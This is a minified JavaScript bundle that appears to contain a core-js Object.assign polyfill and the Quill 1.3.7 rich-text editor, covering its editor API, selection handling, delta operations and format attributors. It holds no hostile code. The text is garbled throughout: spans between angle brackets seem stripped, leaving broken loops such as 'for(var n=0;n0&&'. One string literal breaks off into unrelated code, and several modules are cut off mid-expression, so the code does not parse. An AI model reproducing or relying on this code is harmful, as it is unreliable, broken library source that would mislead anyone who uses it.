i=n(1196),t=n(4932),r=n(8513),o=n(2837),s=n(8084),l=n(400),u=n(8306),c=n(8385),d=n(1036),h=Object.assign,p=Object.defineProperty,m=t([].concat);e.exports=!h||o((function(){if(i&&1!==h({b:1},h(p({},"a",{enumerable:!0,get:function(){p(this,"b",{value:3,enumerable:!1})}}),{b:2})).b)return!0;var e={},a={},n=Symbol(),t="abcdefghijklmnopqrst";return e[n]=7,t.split("").forEach((function(e){a[e]=e})),7!=h({},e)[n]||s(h({},a)).join("")!=t}))?function(e,a){for(var n=c(e),t=arguments.length,o=1,h=l.f,p=u.f;t>o;)for(var f,v=d(arguments[o++]),g=h?m(s(v),h(v)):s(v),b=g.length,k=0;b>k;)f=g[k++],i&&!r(p,v,f)||(n[f]=v[f]);return n}:h},4385:function(e,a,n){var i,t=n(5884),r=n(1697),o=n(2080),s=n(6196),l=n(2012),u=n(937),c=n(9378),d=c("IE_PROTO"),h=function(){},p=function(e){return"
"+t+"


");this.setContents(r),this.history.clear(),this.options.placeholder&&this.root.setAttribute("data-placeholder",this.options.placeholder),this.options.readOnly&&this.disable()}return r(e,null,[{key:"debug",value:function(e){!0===e&&(e="log"),m.default.level(e)}},{key:"find",value:function(e){return e.__quill||c.default.find(e)}},{key:"import",value:function(e){return null==this.imports[e]&&k.error("Cannot import "+e+". Are you sure it was registered?"),this.imports[e]}},{key:"register",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]&&arguments[2];if("string"!==typeof e){var t=e.attrName||e.blotName;"string"===typeof t?this.register("formats/"+t,e,a):Object.keys(e).forEach((function(i){n.register(i,e[i],a)}))}else null==this.imports[e]||i||k.warn("Overwriting "+e+" with",a),this.imports[e]=a,(e.startsWith("blots/")||e.startsWith("formats/"))&&"abstract"!==a.blotName?c.default.register(a):e.startsWith("modules")&&"function"===typeof a.register&&a.register()}}]),r(e,[{key:"addContainer",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if("string"===typeof e){var n=e;(e=document.createElement("div")).classList.add(n)}return this.container.insertBefore(e,a),e}},{key:"blur",value:function(){this.selection.setRange(null)}},{key:"deleteText",value:function(e,a,n){var i=this,r=A(e,a,n),o=t(r,4);return e=o[0],a=o[1],n=o[3],S.call(this,(function(){return i.editor.deleteText(e,a)}),n,e,-1*a)}},{key:"disable",value:function(){this.enable(!1)}},{key:"enable",value:function(){var e=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.scroll.enable(e),this.container.classList.toggle("ql-disabled",!e)}},{key:"focus",value:function(){var e=this.scrollingContainer.scrollTop;this.selection.focus(),this.scrollingContainer.scrollTop=e,this.scrollIntoView()}},{key:"format",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.default.sources.API;return S.call(this,(function(){var i=n.getSelection(!0),t=new o.default;if(null==i)return t;if(c.default.query(e,c.default.Scope.BLOCK))t=n.editor.formatLine(i.index,i.length,g({},e,a));else{if(0===i.length)return n.selection.format(e,a),t;t=n.editor.formatText(i.index,i.length,g({},e,a))}return n.setSelection(i,l.default.sources.SILENT),t}),i)}},{key:"formatLine",value:function(e,a,n,i,r){var o,s=this,l=A(e,a,n,i,r),u=t(l,4);return e=u[0],a=u[1],o=u[2],r=u[3],S.call(this,(function(){return s.editor.formatLine(e,a,o)}),r,e,0)}},{key:"formatText",value:function(e,a,n,i,r){var o,s=this,l=A(e,a,n,i,r),u=t(l,4);return e=u[0],a=u[1],o=u[2],r=u[3],S.call(this,(function(){return s.editor.formatText(e,a,o)}),r,e,0)}},{key:"getBounds",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=void 0;n="number"===typeof e?this.selection.getBounds(e,a):this.selection.getBounds(e.index,e.length);var i=this.container.getBoundingClientRect();return{bottom:n.bottom-i.top,height:n.height,left:n.left-i.left,right:n.right-i.left,top:n.top-i.top,width:n.width}}},{key:"getContents",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.getLength()-e,n=A(e,a),i=t(n,2);return e=i[0],a=i[1],this.editor.getContents(e,a)}},{key:"getFormat",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:this.getSelection(!0),a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0;return"number"===typeof 
e?this.editor.getFormat(e,a):this.editor.getFormat(e.index,e.length)}},{key:"getIndex",value:function(e){return e.offset(this.scroll)}},{key:"getLength",value:function(){return this.scroll.length()}},{key:"getLeaf",value:function(e){return this.scroll.leaf(e)}},{key:"getLine",value:function(e){return this.scroll.line(e)}},{key:"getLines",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE;return"number"!==typeof e?this.scroll.lines(e.index,e.length):this.scroll.lines(e,a)}},{key:"getModule",value:function(e){return this.theme.modules[e]}},{key:"getSelection",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0];return e&&this.focus(),this.update(),this.selection.getRange()[0]}},{key:"getText",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.getLength()-e,n=A(e,a),i=t(n,2);return e=i[0],a=i[1],this.editor.getText(e,a)}},{key:"hasFocus",value:function(){return this.selection.hasFocus()}},{key:"insertEmbed",value:function(a,n,i){var t=this,r=arguments.length>3&&void 0!==arguments[3]?arguments[3]:e.sources.API;return S.call(this,(function(){return t.editor.insertEmbed(a,n,i)}),r,a)}},{key:"insertText",value:function(e,a,n,i,r){var o,s=this,l=A(e,0,n,i,r),u=t(l,4);return e=u[0],o=u[2],r=u[3],S.call(this,(function(){return s.editor.insertText(e,a,o)}),r,e,a.length)}},{key:"isEnabled",value:function(){return!this.container.classList.contains("ql-disabled")}},{key:"off",value:function(){return this.emitter.off.apply(this.emitter,arguments)}},{key:"on",value:function(){return this.emitter.on.apply(this.emitter,arguments)}},{key:"once",value:function(){return this.emitter.once.apply(this.emitter,arguments)}},{key:"pasteHTML",value:function(e,a,n){this.clipboard.dangerouslyPasteHTML(e,a,n)}},{key:"removeFormat",value:function(e,a,n){var i=this,r=A(e,a,n),o=t(r,4);return e=o[0],a=o[1],n=o[3],S.call(this,(function(){return i.editor.removeFormat(e,a)}),n,e)}},{key:"scrollIntoView",value:function(){this.selection.scrollIntoView(this.scrollingContainer)}},{key:"setContents",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API;return S.call(this,(function(){e=new o.default(e);var n=a.getLength(),i=a.editor.deleteText(0,n),t=a.editor.applyDelta(e),r=t.ops[t.ops.length-1];return null!=r&&"string"===typeof r.insert&&"\n"===r.insert[r.insert.length-1]&&(a.editor.deleteText(a.getLength()-1,1),t.delete(1)),i.compose(t)}),n)}},{key:"setSelection",value:function(a,n,i){if(null==a)this.selection.setRange(null,n||e.sources.API);else{var r=A(a,n,i),o=t(r,4);a=o[0],n=o[1],i=o[3],this.selection.setRange(new d.Range(a,n),i),i!==l.default.sources.SILENT&&this.selection.scrollIntoView(this.scrollingContainer)}}},{key:"setText",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API,n=(new o.default).insert(e);return this.setContents(n,a)}},{key:"update",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:l.default.sources.USER,a=this.scroll.update(e);return this.selection.update(e),a}},{key:"updateContents",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API;return S.call(this,(function(){return e=new o.default(e),a.editor.applyDelta(e,n)}),n,!0)}}]),e}();function 
x(e,a){if((a=(0,p.default)(!0,{container:e,modules:{clipboard:!0,keyboard:!0,history:!0}},a)).theme&&a.theme!==y.DEFAULTS.theme){if(a.theme=y.import("themes/"+a.theme),null==a.theme)throw new Error("Invalid theme "+a.theme+". Did you register it?")}else a.theme=f.default;var n=(0,p.default)(!0,{},a.theme.DEFAULTS);[n,a].forEach((function(e){e.modules=e.modules||{},Object.keys(e.modules).forEach((function(a){!0===e.modules[a]&&(e.modules[a]={})}))}));var i=Object.keys(n.modules).concat(Object.keys(a.modules)).reduce((function(e,a){var n=y.import("modules/"+a);return null==n?k.error("Cannot load "+a+" module. Are you sure you registered it?"):e[a]=n.DEFAULTS||{},e}),{});return null!=a.modules&&a.modules.toolbar&&a.modules.toolbar.constructor!==Object&&(a.modules.toolbar={container:a.modules.toolbar}),a=(0,p.default)(!0,{},y.DEFAULTS,{modules:i},n,a),["bounds","container","scrollingContainer"].forEach((function(e){"string"===typeof a[e]&&(a[e]=document.querySelector(a[e]))})),a.modules=Object.keys(a.modules).reduce((function(e,n){return a.modules[n]&&(e[n]=a.modules[n]),e}),{}),a}function S(e,a,n,i){if(this.options.strict&&!this.isEnabled()&&a===l.default.sources.USER)return new o.default;var t=null==n?null:this.getSelection(),r=this.editor.delta,s=e();if(null!=t&&(!0===n&&(n=t.index),null==i?t=w(t,s,a):0!==i&&(t=w(t,n,i,a)),this.setSelection(t,l.default.sources.SILENT)),s.length()>0){var u,c,d=[l.default.events.TEXT_CHANGE,s,r,a];(u=this.emitter).emit.apply(u,[l.default.events.EDITOR_CHANGE].concat(d)),a!==l.default.sources.SILENT&&(c=this.emitter).emit.apply(c,d)}return s}function A(e,a,n,t,r){var o={};return"number"===typeof e.index&&"number"===typeof e.length?"number"!==typeof a?(r=t,t=n,n=a,a=e.length,e=e.index):(a=e.length,e=e.index):"number"!==typeof a&&(r=t,t=n,n=a,a=0),"object"===("undefined"===typeof n?"undefined":i(n))?(o=n,r=t):"string"===typeof n&&(null!=t?o[n]=t:r=n),[e,a,o,r=r||l.default.sources.API]}function w(e,a,n,i){if(null==e)return null;var r=void 0,s=void 0;if(a instanceof o.default){var u=[e.index,e.index+e.length].map((function(e){return a.transformPosition(e,i!==l.default.sources.USER)})),c=t(u,2);r=c[0],s=c[1]}else{var h=[e.index,e.index+e.length].map((function(e){return e=0?e+n:Math.max(a,e+n)})),p=t(h,2);r=p[0],s=p[1]}return new d.Range(r,s-r)}y.DEFAULTS={bounds:null,formats:null,modules:{},placeholder:"",readOnly:!1,scrollingContainer:null,strict:!0,theme:"default"},y.events=l.default.events,y.sources=l.default.sources,y.version="1.3.7",y.imports={delta:o.default,parchment:c.default,"core/module":u.default,"core/theme":f.default},a.expandConfig=x,a.overload=A,a.default=y},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(e,a){for(var n=0;n0){var n=this.parent.isolate(this.offset(),this.length());this.moveChildren(n),n.wrap(this)}}}],[{key:"compare",value:function(e,n){var i=a.order.indexOf(e),t=a.order.indexOf(n);return i>=0||t>=0?i-t:e===n?0:e1?a-1:0),i=1;i1&&void 0!==arguments[1]?arguments[1]:{};i(this,e),this.quill=a,this.options=n};t.DEFAULTS={},a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=["error","warn","log","info"],t="warn";function r(e){if(i.indexOf(e)<=i.indexOf(t)){for(var a,n=arguments.length,r=Array(n>1?n-1:0),o=1;o=0;u--)if(d[u]!=h[u])return!1;for(u=d.length-1;u>=0;u--)if(c=d[u],!o(e[c],a[c],n))return!1;return typeof e===typeof a}(e,a,n))};function s(e){return null===e||void 0===e}function l(e){return!(!e||"object"!==typeof e||"number"!==typeof 
e.length)&&"function"===typeof e.copy&&"function"===typeof e.slice&&!(e.length>0&&"number"!==typeof e[0])}},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(1),t=function(){function e(e,a,n){void 0===n&&(n={}),this.attrName=e,this.keyName=a;var t=i.Scope.TYPE&i.Scope.ATTRIBUTE;null!=n.scope?this.scope=n.scope&i.Scope.LEVEL|t:this.scope=i.Scope.ATTRIBUTE,null!=n.whitelist&&(this.whitelist=n.whitelist)}return e.keys=function(e){return[].map.call(e.attributes,(function(e){return e.name}))},e.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(e.setAttribute(this.keyName,a),!0)},e.prototype.canAdd=function(e,a){return null!=i.query(e,i.Scope.BLOT&(this.scope|i.Scope.TYPE))&&(null==this.whitelist||("string"===typeof a?this.whitelist.indexOf(a.replace(/["']/g,""))>-1:this.whitelist.indexOf(a)>-1))},e.prototype.remove=function(e){e.removeAttribute(this.keyName)},e.prototype.value=function(e){var a=e.getAttribute(this.keyName);return this.canAdd(e,a)&&a?a:""},e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.Code=void 0;var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function(){function e(e,a){for(var n=0;n=e+n)){var o=this.newlineIndex(e,!0)+1,l=r-o+1,u=this.isolate(o,l),c=u.next;u.format(i,t),c instanceof a&&c.formatAt(0,e-o+n-l,i,t)}}}},{key:"insertAt",value:function(e,a,n){if(null==n){var t=this.descendant(c.default,e),r=i(t,2),o=r[0],s=r[1];o.insertAt(s,a)}}},{key:"length",value:function(){var e=this.domNode.textContent.length;return this.domNode.textContent.endsWith("\n")?e:e+1}},{key:"newlineIndex",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]&&arguments[1];if(a)return this.domNode.textContent.slice(0,e).lastIndexOf("\n");var n=this.domNode.textContent.slice(e).indexOf("\n");return n>-1?e+n:-1}},{key:"optimize",value:function(e){this.domNode.textContent.endsWith("\n")||this.appendChild(s.default.create("text","\n")),r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"optimize",this).call(this,e);var n=this.next;null!=n&&n.prev===this&&n.statics.blotName===this.statics.blotName&&this.statics.formats(this.domNode)===n.statics.formats(n.domNode)&&(n.optimize(e),n.moveChildren(this),n.remove())}},{key:"replace",value:function(e){r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"replace",this).call(this,e),[].slice.call(this.domNode.querySelectorAll("*")).forEach((function(e){var a=s.default.find(e);null==a?e.parentNode.removeChild(e):a instanceof s.default.Embed?a.remove():a.unwrap()}))}}],[{key:"create",value:function(e){var n=r(a.__proto__||Object.getPrototypeOf(a),"create",this).call(this,e);return n.setAttribute("spellcheck",!1),n}},{key:"formats",value:function(){return!0}}]),a}(l.default);v.blotName="code-block",v.tagName="PRE",v.TAB=" ",a.Code=f,a.default=v},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(e,a){if(Array.isArray(e))return 
e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},r=function(){function e(e,a){for(var n=0;n=r&&!p.endsWith("\n")&&(n=!0),a.scroll.insertAt(e,p);var m=a.scroll.line(e),f=t(m,2),g=f[0],b=f[1],k=(0,v.default)({},(0,d.bubbleFormats)(g));if(g instanceof h.default){var y=g.descendant(l.default.Leaf,b),x=t(y,1)[0];k=(0,v.default)(k,(0,d.bubbleFormats)(x))}c=s.default.attributes.diff(k,c)||{}}else if("object"===i(o.insert)){var S=Object.keys(o.insert)[0];if(null==S)return e;a.scroll.insertAt(e,S,o.insert[S])}r+=u}return Object.keys(c).forEach((function(n){a.scroll.formatAt(e,u,n,c[n])})),e+u}),0),e.reduce((function(e,n){return"number"===typeof n.delete?(a.scroll.deleteAt(e,n.delete),e):e+(n.retain||n.insert.length||1)}),0),this.scroll.batchEnd(),this.update(e)}},{key:"deleteText",value:function(e,a){return this.scroll.deleteAt(e,a),this.update((new o.default).retain(e).delete(a))}},{key:"formatLine",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return this.scroll.update(),Object.keys(i).forEach((function(t){if(null==n.scroll.whitelist||n.scroll.whitelist[t]){var r=n.scroll.lines(e,Math.max(a,1)),o=a;r.forEach((function(a){var r=a.length();if(a instanceof u.default){var s=e-a.offset(n.scroll),l=a.newlineIndex(s+o)-s+1;a.formatAt(s,l,t,i[t])}else a.format(t,i[t]);o-=r}))}})),this.scroll.optimize(),this.update((new o.default).retain(e).retain(a,(0,m.default)(i)))}},{key:"formatText",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return Object.keys(i).forEach((function(t){n.scroll.formatAt(e,a,t,i[t])})),this.update((new o.default).retain(e).retain(a,(0,m.default)(i)))}},{key:"getContents",value:function(e,a){return this.delta.slice(e,e+a)}},{key:"getDelta",value:function(){return this.scroll.lines().reduce((function(e,a){return e.concat(a.delta())}),new o.default)}},{key:"getFormat",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=[],i=[];0===a?this.scroll.path(e).forEach((function(e){var a=t(e,1)[0];a instanceof h.default?n.push(a):a instanceof l.default.Leaf&&i.push(a)})):(n=this.scroll.lines(e,a),i=this.scroll.descendants(l.default.Leaf,e,a));var r=[n,i].map((function(e){if(0===e.length)return{};for(var a=(0,d.bubbleFormats)(e.shift());Object.keys(a).length>0;){var n=e.shift();if(null==n)return a;a=y((0,d.bubbleFormats)(n),a)}return a}));return v.default.apply(v.default,r)}},{key:"getText",value:function(e,a){return this.getContents(e,a).filter((function(e){return"string"===typeof e.insert})).map((function(e){return e.insert})).join("")}},{key:"insertEmbed",value:function(e,a,n){return this.scroll.insertAt(e,a,n),this.update((new o.default).retain(e).insert(function(e,a,n){return a in e?Object.defineProperty(e,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[a]=n,e}({},a,n)))}},{key:"insertText",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return a=a.replace(/\r\n/g,"\n").replace(/\r/g,"\n"),this.scroll.insertAt(e,a),Object.keys(i).forEach((function(t){n.scroll.formatAt(e,a.length,t,i[t])})),this.update((new 
o.default).retain(e).insert(a,(0,m.default)(i)))}},{key:"isBlank",value:function(){if(0==this.scroll.children.length)return!0;if(this.scroll.children.length>1)return!1;var e=this.scroll.children.head;return e.statics.blotName===h.default.blotName&&!(e.children.length>1)&&e.children.head instanceof p.default}},{key:"removeFormat",value:function(e,a){var n=this.getText(e,a),i=this.scroll.line(e+a),r=t(i,2),s=r[0],l=r[1],c=0,d=new o.default;null!=s&&(c=s instanceof u.default?s.newlineIndex(l)-l+1:s.length()-l,d=s.delta().slice(l,l+c-1).insert("\n"));var h=this.getContents(e,a+c).diff((new o.default).insert(n).concat(d)),p=(new o.default).retain(e).concat(h);return this.applyDelta(p)}},{key:"update",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:[],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:void 0,i=this.delta;if(1===a.length&&"characterData"===a[0].type&&a[0].target.data.match(b)&&l.default.find(a[0].target)){var t=l.default.find(a[0].target),r=(0,d.bubbleFormats)(t),s=t.offset(this.scroll),u=a[0].oldValue.replace(c.default.CONTENTS,""),h=(new o.default).insert(u),p=(new o.default).insert(t.value()),m=(new o.default).retain(s).concat(h.diff(p,n));e=m.reduce((function(e,a){return a.insert?e.insert(a.insert,r):e.push(a)}),new o.default),this.delta=i.compose(e)}else this.delta=this.getDelta(),e&&(0,f.default)(i.compose(e),this.delta)||(e=i.diff(this.delta,n));return e}}]),e}();function y(e,a){return Object.keys(a).reduce((function(n,i){return null==e[i]||(a[i]===e[i]?n[i]=a[i]:Array.isArray(a[i])?a[i].indexOf(e[i])<0&&(n[i]=a[i].concat([e[i]])):n[i]=[a[i],e[i]]),n}),{})}a.default=k},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.Range=void 0;var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function(){function e(e,a){for(var n=0;n1&&void 0!==arguments[1]?arguments[1]:0;d(this,e),this.index=a,this.length=n},m=function(){function e(a,n){var i=this;d(this,e),this.emitter=n,this.scroll=a,this.composing=!1,this.mouseDown=!1,this.root=this.scroll.domNode,this.cursor=r.default.create("cursor",this),this.lastRange=this.savedRange=new p(0,0),this.handleComposition(),this.handleDragging(),this.emitter.listenDOM("selectionchange",document,(function(){i.mouseDown||setTimeout(i.update.bind(i,l.default.sources.USER),1)})),this.emitter.on(l.default.events.EDITOR_CHANGE,(function(e,a){e===l.default.events.TEXT_CHANGE&&a.length()>0&&i.update(l.default.sources.SILENT)})),this.emitter.on(l.default.events.SCROLL_BEFORE_UPDATE,(function(){if(i.hasFocus()){var e=i.getNativeRange();null!=e&&e.start.node!==i.cursor.textNode&&i.emitter.once(l.default.events.SCROLL_UPDATE,(function(){try{i.setNativeRange(e.start.node,e.start.offset,e.end.node,e.end.offset)}catch(a){}}))}})),this.emitter.on(l.default.events.SCROLL_OPTIMIZE,(function(e,a){if(a.range){var n=a.range,t=n.startNode,r=n.startOffset,o=n.endNode,s=n.endOffset;i.setNativeRange(t,r,o,s)}})),this.update(l.default.sources.SILENT)}return t(e,[{key:"handleComposition",value:function(){var 
e=this;this.root.addEventListener("compositionstart",(function(){e.composing=!0})),this.root.addEventListener("compositionend",(function(){if(e.composing=!1,e.cursor.parent){var a=e.cursor.restore();if(!a)return;setTimeout((function(){e.setNativeRange(a.startNode,a.startOffset,a.endNode,a.endOffset)}),1)}}))}},{key:"handleDragging",value:function(){var e=this;this.emitter.listenDOM("mousedown",document.body,(function(){e.mouseDown=!0})),this.emitter.listenDOM("mouseup",document.body,(function(){e.mouseDown=!1,e.update(l.default.sources.USER)}))}},{key:"focus",value:function(){this.hasFocus()||(this.root.focus(),this.setRange(this.savedRange))}},{key:"format",value:function(e,a){if(null==this.scroll.whitelist||this.scroll.whitelist[e]){this.scroll.update();var n=this.getNativeRange();if(null!=n&&n.native.collapsed&&!r.default.query(e,r.default.Scope.BLOCK)){if(n.start.node!==this.cursor.textNode){var i=r.default.find(n.start.node,!1);if(null==i)return;if(i instanceof r.default.Leaf){var t=i.split(n.start.offset);i.parent.insertBefore(this.cursor,t)}else i.insertBefore(this.cursor,n.start.node);this.cursor.attach()}this.cursor.format(e,a),this.scroll.optimize(),this.setNativeRange(this.cursor.textNode,this.cursor.textNode.data.length),this.update()}}}},{key:"getBounds",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=this.scroll.length();e=Math.min(e,n-1),a=Math.min(e+a,n-1)-e;var t=void 0,r=this.scroll.leaf(e),o=i(r,2),s=o[0],l=o[1];if(null==s)return null;var u=s.position(l,!0),c=i(u,2);t=c[0],l=c[1];var d=document.createRange();if(a>0){d.setStart(t,l);var h=this.scroll.leaf(e+a),p=i(h,2);if(s=p[0],l=p[1],null==s)return null;var m=s.position(l,!0),f=i(m,2);return t=f[0],l=f[1],d.setEnd(t,l),d.getBoundingClientRect()}var v="left",g=void 0;return t instanceof Text?(l<t.data.length?(d.setStart(t,l),d.setEnd(t,l+1)):(d.setStart(t,l-1),d.setEnd(t,l),v="right"),g=d.getBoundingClientRect()):(g=s.domNode.getBoundingClientRect(),l>0&&(v="right")),{bottom:g.top+g.height,height:g.height,left:g[v],right:g[v],top:g.top,width:0}}},{key:"getNativeRange",value:function(){var e=document.getSelection();if(null==e||e.rangeCount<=0)return null;var a=e.getRangeAt(0);if(null==a)return null;var n=this.normalizeNative(a);return h.info("getNativeRange",n),n}},{key:"getRange",value:function(){var e=this.getNativeRange();return null==e?[null,null]:[this.normalizedToRange(e),e]}},{key:"hasFocus",value:function(){return document.activeElement===this.root}},{key:"normalizedToRange",value:function(e){var a=this,n=[[e.start.node,e.start.offset]];e.native.collapsed||n.push([e.end.node,e.end.offset]);var t=n.map((function(e){var n=i(e,2),t=n[0],o=n[1],s=r.default.find(t,!0),l=s.offset(a.scroll);return 0===o?l:s instanceof r.default.Container?l+s.length():l+s.index(t,o)})),o=Math.min(Math.max.apply(Math,c(t)),this.scroll.length()-1),s=Math.min.apply(Math,[o].concat(c(t)));return new p(s,o-s)}},{key:"normalizeNative",value:function(e){if(!f(this.root,e.startContainer)||!e.collapsed&&!f(this.root,e.endContainer))return null;var a={start:{node:e.startContainer,offset:e.startOffset},end:{node:e.endContainer,offset:e.endOffset},native:e};return[a.start,a.end].forEach((function(e){for(var a=e.node,n=e.offset;!(a instanceof Text)&&a.childNodes.length>0;)if(a.childNodes.length>n)a=a.childNodes[n],n=0;else{if(a.childNodes.length!==n)break;n=(a=a.lastChild)instanceof Text?a.data.length:a.childNodes.length+1}e.node=a,e.offset=n})),a}},{key:"rangeToNative",value:function(e){var a=this,n=e.collapsed?[e.index]:[e.index,e.index+e.length],t=[],r=this.scroll.length();return n.forEach((function(e,n){e=Math.min(r-1,e);var 
o,s=a.scroll.leaf(e),l=i(s,2),u=l[0],c=l[1],d=u.position(c,0!==n),h=i(d,2);o=h[0],c=h[1],t.push(o,c)})),t.length<2&&(t=t.concat(t)),t}},{key:"scrollIntoView",value:function(e){var a=this.lastRange;if(null!=a){var n=this.getBounds(a.index,a.length);if(null!=n){var t=this.scroll.length()-1,r=this.scroll.line(Math.min(a.index,t)),o=i(r,1)[0],s=o;if(a.length>0){var l=this.scroll.line(Math.min(a.index+a.length,t));s=i(l,1)[0]}if(null!=o&&null!=s){var u=e.getBoundingClientRect();n.topu.bottom&&(e.scrollTop+=n.bottom-u.bottom)}}}}},{key:"setNativeRange",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:e,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:a,t=arguments.length>4&&void 0!==arguments[4]&&arguments[4];if(h.info("setNativeRange",e,a,n,i),null==e||null!=this.root.parentNode&&null!=e.parentNode&&null!=n.parentNode){var r=document.getSelection();if(null!=r)if(null!=e){this.hasFocus()||this.root.focus();var o=(this.getNativeRange()||{}).native;if(null==o||t||e!==o.startContainer||a!==o.startOffset||n!==o.endContainer||i!==o.endOffset){"BR"==e.tagName&&(a=[].indexOf.call(e.parentNode.childNodes,e),e=e.parentNode),"BR"==n.tagName&&(i=[].indexOf.call(n.parentNode.childNodes,n),n=n.parentNode);var s=document.createRange();s.setStart(e,a),s.setEnd(n,i),r.removeAllRanges(),r.addRange(s)}}else r.removeAllRanges(),this.root.blur(),document.body.focus()}}},{key:"setRange",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.default.sources.API;if("string"===typeof a&&(n=a,a=!1),h.info("setRange",e),null!=e){var i=this.rangeToNative(e);this.setNativeRange.apply(this,c(i).concat([a]))}else this.setNativeRange(null);this.update(n)}},{key:"update",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:l.default.sources.USER,a=this.lastRange,n=this.getRange(),t=i(n,2),r=t[0],u=t[1];if(this.lastRange=r,null!=this.lastRange&&(this.savedRange=this.lastRange),!(0,s.default)(a,this.lastRange)){var c;!this.composing&&null!=u&&u.native.collapsed&&u.start.node!==this.cursor.textNode&&this.cursor.restore();var d,h=[l.default.events.SELECTION_CHANGE,(0,o.default)(this.lastRange),(0,o.default)(a),e];(c=this.emitter).emit.apply(c,[l.default.events.EDITOR_CHANGE].concat(h)),e!==l.default.sources.SILENT&&(d=this.emitter).emit.apply(d,h)}}}]),e}();function f(e,a){try{a.parentNode}catch(n){return!1}return a instanceof Text&&(a=a.parentNode),e.contains(a)}a.Range=p,a.default=m},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n0&&(n+=1),[this.parent.domNode,n]},a.prototype.value=function(){var e;return(e={})[this.statics.blotName]=this.statics.value(this.domNode)||!0,e},a.scope=r.Scope.INLINE_BLOT,a}(t.default);a.default=o},function(e,a,n){var i=n(11),t=n(3),r={attributes:{compose:function(e,a,n){"object"!==typeof e&&(e={}),"object"!==typeof a&&(a={});var i=t(!0,{},a);for(var r in n||(i=Object.keys(i).reduce((function(e,a){return null!=i[a]&&(e[a]=i[a]),e}),{})),e)void 0!==e[r]&&void 0===a[r]&&(i[r]=e[r]);return Object.keys(i).length>0?i:void 0},diff:function(e,a){"object"!==typeof e&&(e={}),"object"!==typeof a&&(a={});var n=Object.keys(e).concat(Object.keys(a)).reduce((function(n,t){return i(e[t],a[t])||(n[t]=void 0===a[t]?null:a[t]),n}),{});return Object.keys(n).length>0?n:void 0},transform:function(e,a,n){if("object"!==typeof e)return a;if("object"===typeof a){if(!n)return a;var 
